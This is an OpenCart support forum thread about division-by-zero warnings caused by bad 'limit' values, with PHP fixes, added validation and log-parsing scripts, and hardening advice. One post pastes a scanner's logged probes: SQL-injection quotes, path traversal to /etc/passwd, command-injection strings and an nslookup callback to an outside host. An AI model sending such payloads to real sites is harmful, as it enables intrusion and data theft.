Post by tiredman » Sat Jun 05, 2021 12:29 pm

Hello,
I'm running OC version 3.0.3.6 in the default theme
I'm wondering if you have a clue as to what's causing this. It suddenly keeps appearing; although I've seen it before, it ran once in a while, and not like now:
In the Error.log file:

Code:

2021-06-05 11:50:14 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:14 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:14 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:14 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:16 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:16 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
2021-06-05 11:50:16 - PHP Warning:  Division by zero in .../catalog/controller/product/category.php on line 332
Line 332 in category.php says:

Code:

$data['results'] = sprintf($this->language->get('text_pagination'),
    ($product_total) ? (($page - 1) * $limit) + 1 : 0,
    ((($page - 1) * $limit) > ($product_total - $limit)) ? $product_total : ((($page - 1) * $limit) + $limit),
    $product_total,
    ceil($product_total / $limit)); // the division that warns when $limit is 0


I have amended the category file's index() function to cast $page and $limit to integer with (int), like so:

Code:

if (isset($this->request->get['page'])) {
    $page = (int)$this->request->get['page'];
} else {
    $page = 1;
}

if (isset($this->request->get['limit'])) {
    $limit = (int)$this->request->get['limit'];
} else {
    $limit = $this->config->get('theme_' . $this->config->get('config_theme') . '_product_limit');
}

This did not help. The errors kept appearing.
Please let me know if you have come across this and have a solution to it.
Thanks! :-)
Last edited by tiredman on Wed Jun 09, 2021 11:26 pm, edited 1 time in total.

Post by straightlight » Sat Jun 05, 2021 6:46 pm

Which PHP version?

Dedication and passion goes to those who are able to push and merge a project.

Regards,
Straightlight
Programmer / Opencart Tester

Post by tiredman » Mon Jun 07, 2021 7:18 am

Thanks.
"I'm running OC version 3.0.3.6 in the default theme".
As strangely as it suddenly appeared, it has stopped.
However, before that, due to the torrent of lines, a message appeared saying the error.log file had exceeded some '5.8' MB and stopped receiving new error lines. This was within hours of clearing it.


Post by Cue4cheap » Mon Jun 07, 2021 7:29 am

tiredman wrote:
Mon Jun 07, 2021 7:18 am
Thanks.
"I'm running OC version 3.0.3.6 in the default theme".
That is your OC version. He was asking your php version.
Mike

cue4cheap not cheap quality

Post by ADD Creative » Mon Jun 07, 2021 4:57 pm

Something is using '&limit=0' (or something that PHP equates to 0) in a category URL.

You may be able to stop the log filling up by changing:

Code:

if (isset($this->request->get['limit'])) {

to:

Code:

if (!empty($this->request->get['limit'])) {

However, it could be another error causing the invalid limit value. Search your web access logs for &limit=0 and see what the referring page is. You could have some bad links on your site.

It could also be caused by a bot accessing values it shouldn't. So make sure display errors is switched off in all three places it needs to be.

www.add-creative.co.uk
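As an added example (it is not ADD Creative's code and not OpenCart's), here is the pagination arithmetic from line 332 wrapped in a small script that resolves `limit` the way the posts discuss. It goes one step beyond the suggested `!empty()` change: `!empty()` rejects `0` and an empty string, but `(int)'abc'`, `(int)'../50'` and a negative value still reach the division as 0 or a negative, so the script validates the limit as an integer in a bounded range instead. The function names, the default of 15, the cap of 100 and the sample values are assumptions made for the example.

```php
<?php
// Added example, not OpenCart's code. Shows what the (int) cast and the
// suggested !empty() check each do with a raw ?limit= value, then validates
// the limit as a positive integer before the pagination division.
declare(strict_types=1);

// What the controller's (int) cast and the !empty() check each do with a raw
// query value. Returns [cast value, passes !empty()].
function naiveChecks(string $raw): array
{
    return [(int)$raw, !empty($raw)];
}

// Resolve the per-page limit. Anything that is not an integer in [1, $max]
// falls back to $default, so the division can never see 0 or a negative.
function resolveLimit(array $get, int $default, int $max = 100): int
{
    if (!isset($get['limit'])) {
        return $default;
    }
    $limit = filter_var($get['limit'], FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => $max],
    ]);
    return $limit === false ? $default : $limit;
}

// Same rule for the page number: anything but a positive integer becomes 1.
function resolvePage(array $get): int
{
    if (!isset($get['page'])) {
        return 1;
    }
    $page = filter_var($get['page'], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $page === false ? 1 : $page;
}

// The arithmetic of the original line 332, fed only validated integers.
function paginationText(string $format, int $productTotal, int $page, int $limit): string
{
    $start = $productTotal ? (($page - 1) * $limit) + 1 : 0;
    $end   = ((($page - 1) * $limit) > ($productTotal - $limit))
        ? $productTotal
        : ((($page - 1) * $limit) + $limit);
    return sprintf($format, $start, $end, $productTotal, (int)ceil($productTotal / $limit));
}

// Constructed sample values, modelled on the kinds of ?limit= seen in the thread.
$samples = ['50', '0', '', 'abc', '-5', '../50', "50\0", '1%00%C0%A7', '999999'];
$format  = 'Showing %d to %d of %d (%d Pages)';

foreach ($samples as $raw) {
    [$cast, $passesEmpty] = naiveChecks($raw);
    $limit = resolveLimit(['limit' => $raw], 15);
    printf(
        "raw=%-14s (int)=%-7d !empty=%-5s validated=%3d  %s\n",
        json_encode($raw),
        $cast,
        $passesEmpty ? 'true' : 'false',
        $limit,
        paginationText($format, 37, resolvePage([]), $limit)
    );
}
```

Run it with `php` on the command line; the columns show that `!empty()` lets `abc`, `-5` and `../50` through while the validated column always holds a usable limit. The same `filter_var()` rule is applied to `page`, since that value feeds the same arithmetic.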



Post by paulfeakins » Mon Jun 07, 2021 6:51 pm

tiredman wrote:
Sat Jun 05, 2021 12:29 pm

Code:

.../catalog/controller/product/category.php
What's the full path?

UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk



Post by tiredman » Tue Jun 08, 2021 1:12 am

Sorry, it is.
Cue4cheap wrote:
Mon Jun 07, 2021 7:29 am
tiredman wrote:
Mon Jun 07, 2021 7:18 am
Thanks.
"I'm running OC version 3.0.3.6 in the default theme".
That is your OC version. He was asking your php version.
Mike
Oh! It is PHP 7.3.27 (cli) (built: Feb 9 2021 01:14:02) ( NTS )


Post by tiredman » Tue Jun 08, 2021 1:34 am

I think this is it. In my web server error.log, thousands and thousands of lines like this, all from 1 IP address... :
2021/06/04 20:27:54 [error] 60066#101077: *4885441 open() "/directory/javax.faces.resource.../WEB-INF/web.xml.jsf" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /javax.faces.resource.../WEB-INF/web.xml.jsf HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:54 [error] 60066#101077: *4885526 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=1'" HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:54 [error] 60066#101077: *4885526 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=1%00%C0%A7%C0%A2%252527%252522 HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:54 [error] 60069#100986: *4885455 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=%40%40yMx8R HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:55 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=50%00 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=response.write(9061158*9577379) HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=echo%20wwgtuh%24()%5C%20kwruxn%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20wwgtuh%24()%5C%20kwruxn%5Cnz%5Exyu%7C%7Ca%20%23%7C"%20%26echo%20wwgtuh%24()%5C%20kwruxn%5Cnz%5Exyu%7C%7Ca%20%23 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60060#101174: *4884911 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=../../../../../../../../../../etc/passwd HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit='%2Bresponse.write(9061158*9577379)%2B' HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=%26echo%20haljhb%24()%5C%20htqvsy%5Cnz%5Exyu%7C%7Ca%20%23'%20%26echo%20haljhb%24()%5C%20htqvsy%5Cnz%5Exyu%7C%7Ca%20%23%7C"%20%26echo%20haljhb%24()%5C%20htqvsy%5Cnz%5Exyu%7C%7Ca%20%23 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60060#101174: *4884911 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=../../../../../../../../../../windows/win.ini HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit="%2Bresponse.write(9061158*9577379)%2B" HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=%7Cecho%20mrhwek%24()%5C%20mdmzmd%5Cnz%5Exyu%7C%7Ca%20%23'%20%7Cecho%20mrhwek%24()%5C%20mdmzmd%5Cnz%5Exyu%7C%7Ca%20%23%7C"%20%7Cecho%20mrhwek%24()%5C%20mdmzmd%5Cnz%5Exyu%7C%7Ca%20%23 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60060#101174: *4884911 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=50 HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=(nslookup%20hitwlhttyvfdwede1f.bxss.me%7C%7Cperl%20-e%20"gethostbyname('hitwlhttyvfdwede1f.bxss.me')") HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=../50 HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60060#101174: *4884911 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit= HTTP/1.1", host: "www.example.com", referrer: "https://www.example.com/"
2021/06/04 20:27:56 [error] 60070#100985: *4885098 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server: www.example.com, request: "GET /prouduct?limit=50<esi:include%20src="http://bxss.me/rpb.png"/> HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:57 [error] 60066#101077: *4885441 open() "/directory/prouduct" failed (2: No such file or directory), client: 91.121.88.210, server:….

He has left for now. ;D I don't think anything can be done to prevent this from happening again?... just one of those things you wished would go away forever.

Many thanks for your reply. I'll keep an eye out for the server error.logs from now.

Kind Regards
ADD Creative wrote:
Mon Jun 07, 2021 4:57 pm
Something is using '&limit=0' (or something that PHP equates to 0) in a category URL.

You may be able to stop the log filling up by changing:

Code:

if (isset($this->request->get['limit'])) {

to:

Code:

if (!empty($this->request->get['limit'])) {

However, it could be another error causing the invalid limit value. Search your web access logs for &limit=0 and see what the referring page is. You could have some bad links on your site.

It could also be caused by a bot accessing values it shouldn't. So make sure display errors is switched off in all three places it needs to be.


Post by straightlight » Tue Jun 08, 2021 1:54 am

prouduct
This controller file does not exist in the OC core.


Post by ADD Creative » Tue Jun 08, 2021 3:06 am

tiredman wrote:
Tue Jun 08, 2021 1:34 am
I think this is it. In my web server error.log, thousands and thousands of lines like this, all from 1 IP address... :

He has left for now. ;D I don't think anything can be done to prevent this from happening again?... just one of those things you wished would go away forever.
Block the IP in your hosting control panel if you haven't already. Although they will probably just change it later on.

Make sure display errors is switched off in the three places, as the error messages could reveal useful information to an attacker.


Post by tiredman » Tue Jun 08, 2021 7:27 pm

I changed it. It has my root folder with it, that I don't want to show. I'm dyslexic, I didn't realise that it was misspelled.
straightlight wrote:
Tue Jun 08, 2021 1:54 am
prouduct
This controller file does not exist in the OC core.


Post by tiredman » Tue Jun 08, 2021 7:57 pm

ADD Creative wrote:
Tue Jun 08, 2021 3:06 am
tiredman wrote:
Tue Jun 08, 2021 1:34 am
I think this is it. In my web server error.log, thousands and thousands of lines like this, all from 1 IP address... :

He has left for now. ;D I don't think anything can be done to prevent this from happening again?... just one of those things you wished would go away forever.
Block the IP in your hosting control panel if you haven't already. Although they will probably just change it later on.

Make sure display errors is switched off in the three places, as the error messages could reveal useful information to an attacker.
All 3 were turned on. I went to turn them off, in php.ini, the system/config/default.php and in OC settings.
Thanks!


Post by mona » Wed Jun 09, 2021 7:54 pm

ADD Creative wrote:
Block the IP in your hosting control panel if you haven't already. Although they will probably just change it later on.
Correct, that is why IP blocking is futile.

These messages are in your web-server log because it cannot find the requested file/directory.

That means your loglevel is set too low, it will produce an error message in your log file whenever someone requests a resource you do not have.

I guarantee you that will happen often, not just from this ip but from thousands of other ips who are/will-be probing what you do have and in your case fill up your error log rapidly.

So check your web-server loglevel and set it higher if you can as these are not errors and should not be logged unless you are debugging.

LogLevel adjusts the verbosity of the messages recorded in the error logs (see ErrorLog directive). The following levels are available, in order of decreasing significance:

Level    Description                                      Example
emerg    Emergencies - system is unusable.                "Child cannot open lock file. Exiting"
alert    Action must be taken immediately.                "getpwuid: couldn't determine user name from uid"
crit     Critical Conditions.                             "socket: Failed to get a socket, exiting child"
error    Error conditions.                                "Premature end of script headers"
warn     Warning conditions.                              "child process 1234 did not exit, sending another SIGHUP"
notice   Normal but significant condition.                "httpd: caught SIGBUS, attempting to dump core in ..."
info     Informational.                                   "Server seems busy, (you may need to increase StartServers, or Min/MaxSpareServers)..."
debug    Debug-level messages                             "Opening config file ..."
trace1   Trace messages                                   "proxy: FTP: control connection complete"
trace2   Trace messages                                   "proxy: CONNECT: sending the CONNECT request to the remote proxy"
trace3   Trace messages                                   "openssl: Handshake: start"
trace4   Trace messages                                   "read from buffered SSL brigade, mode 0, 17 bytes"
trace5   Trace messages                                   "map lookup FAILED: map=rewritemap key=keyname"
trace6   Trace messages                                   "cache lookup FAILED, forcing new map lookup"
trace7   Trace messages, dumping large amounts of data    "| 0000: 02 23 44 30 13 40 ac 34 df 3d bf 9a 19 49 39 15 |"
trace8   Trace messages, dumping large amounts of data    "| 0000: 02 23 44 30 13 40 ac 34 df 3d bf 9a 19 49 39 15 |"

DISCLAIMER:
You should not modify core files .. if you would like to donate a cup of coffee I will write it in a modification for you.


https://www.youtube.com/watch?v=zXIxDoCRc84


User avatar
Expert Member

Posts

Joined
Mon Jun 10, 2019 9:31 am

Post by straightlight » Wed Jun 09, 2021 8:06 pm

In the easiest scenario, if a situation is about solving log levels, better to contact your host at this point.


Post by tiredman » Wed Jun 09, 2021 11:24 pm

I haven't given much thought to blocking IPs with this intentional way of causing errors – blocking them in an automatic way. I did an IP ban to those who tried to make an admin login attempt... the endpoint is fixed, so that was easy in some way. There was a period early this year when > 100k failed attempts were made from a range of hundreds of unique IPs from all over. Some mastermind was using a 'dictionary' of usernames, from a to z, and then recycling it back... but it wasn't a manual attempt, so some bot was doing it for him, because you can get as many as 30 tries in a minute.
With this style of causing errors, he is logging the error messages and mining for a loophole. I need to sort this out on the server OS level.
I'm hosting OC on my own *nix server... it takes care of server logs by 'rotation'. I gotta find an app that can track error.log entries of a certain type and fire a script to ban it.
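An added example of the kind of tracking described in the post above (it is not part of the thread and not from any project): a small PHP script that reads nginx error.log lines of the shape posted earlier, pulls out the client IP and the `limit` query value, and counts per IP how many requests carried a value that is not a positive integer. The log lines inside it are constructed to mirror the thread's, using the documentation addresses 203.0.113.10 and 198.51.100.7; the threshold of 5 and the function names are assumptions. It only reports IPs for review and hands nothing to a firewall itself.

```php
<?php
// Added example, not part of the thread. Parses nginx error.log lines like the
// ones posted and reports client IPs that repeatedly send a ?limit= value that
// is not a positive integer. Sample lines are constructed; the addresses are
// documentation ranges, not the one in the thread.
declare(strict_types=1);

// Constructed sample log lines in the nginx error.log format shown in the thread.
const SAMPLE_LOG = <<<'LOG'
2021/06/04 20:27:54 [error] 60066#101077: *1 open() "/directory/product" failed (2: No such file or directory), client: 203.0.113.10, server: www.example.com, request: "GET /product?limit=1' HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:54 [error] 60066#101077: *2 open() "/directory/product" failed (2: No such file or directory), client: 203.0.113.10, server: www.example.com, request: "GET /product?limit=50%00 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:55 [error] 60066#101077: *3 open() "/directory/product" failed (2: No such file or directory), client: 203.0.113.10, server: www.example.com, request: "GET /product?limit=../../../../etc/passwd HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:55 [error] 60066#101077: *4 open() "/directory/product" failed (2: No such file or directory), client: 203.0.113.10, server: www.example.com, request: "GET /product?limit= HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *5 open() "/directory/product" failed (2: No such file or directory), client: 203.0.113.10, server: www.example.com, request: "GET /product?limit=0 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:56 [error] 60066#101077: *6 open() "/directory/product" failed (2: No such file or directory), client: 203.0.113.10, server: www.example.com, request: "GET /product?limit=50 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:57 [error] 60066#101077: *7 open() "/directory/old-page" failed (2: No such file or directory), client: 198.51.100.7, server: www.example.com, request: "GET /old-page?limit=25 HTTP/1.1", host: "www.example.com"
2021/06/04 20:27:58 [error] 60066#101077: *8 open() "/directory/favicon.ico" failed (2: No such file or directory), client: 198.51.100.7, server: www.example.com, request: "GET /favicon.ico HTTP/1.1", host: "www.example.com"
LOG;

// Extract the client IP and the raw request path from one error.log line.
function parseErrorLine(string $line): ?array
{
    if (!preg_match('/client: (?<ip>[0-9a-fA-F.:]+), .*?request: "GET (?<path>\S+) HTTP\//', $line, $m)) {
        return null;
    }
    return ['ip' => $m['ip'], 'path' => $m['path']];
}

// Pull the raw (still URL-encoded) limit value out of a request path, or null
// when the request carried no limit parameter at all.
function rawLimit(string $path): ?string
{
    return preg_match('/[?&]limit=([^&]*)/', $path, $m) ? $m[1] : null;
}

// A limit is acceptable only if it decodes to a positive integer.
function isValidLimit(string $raw): bool
{
    $decoded = rawurldecode($raw);
    return filter_var($decoded, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) !== false;
}

// Count, per client IP, the requests whose limit value is invalid.
function suspiciousLimitCounts(string $log): array
{
    $counts = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $parsed = parseErrorLine($line);
        if ($parsed === null) {
            continue;
        }
        $raw = rawLimit($parsed['path']);
        if ($raw === null || isValidLimit($raw)) {
            continue;
        }
        $counts[$parsed['ip']] = ($counts[$parsed['ip']] ?? 0) + 1;
    }
    arsort($counts);
    return $counts;
}

// IPs at or above the threshold; hand these to the server's own ban mechanism.
function ipsToReview(array $counts, int $threshold): array
{
    $over = array_filter($counts, function (int $n) use ($threshold): bool {
        return $n >= $threshold;
    });
    return array_keys($over);
}

$counts = suspiciousLimitCounts(SAMPLE_LOG);
foreach ($counts as $ip => $n) {
    printf("%-15s %d invalid limit value(s)\n", $ip, $n);
}
print_r(ipsToReview($counts, 5));
```

In the constructed data only 203.0.113.10 crosses the threshold; 198.51.100.7 sends a valid `limit=25` and a missing favicon, neither of which counts. Running a script like this from a cron job against the rotated log, rather than tailing it live, keeps it independent of the web server's own log level, which is the setting mona's post is about.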


Post by ADD Creative » Wed Jun 09, 2021 11:54 pm

It's not just error messages the bots look for; it can be anything in the response.

If you only access your admin from a fixed or nearly fixed IP address, making an allow list can be a simple option.


Post by tiredman » Thu Jun 10, 2021 12:09 am

It is open to all, but logins are "geo-allowed" on submit.
So you think it would be pointless to monitor?
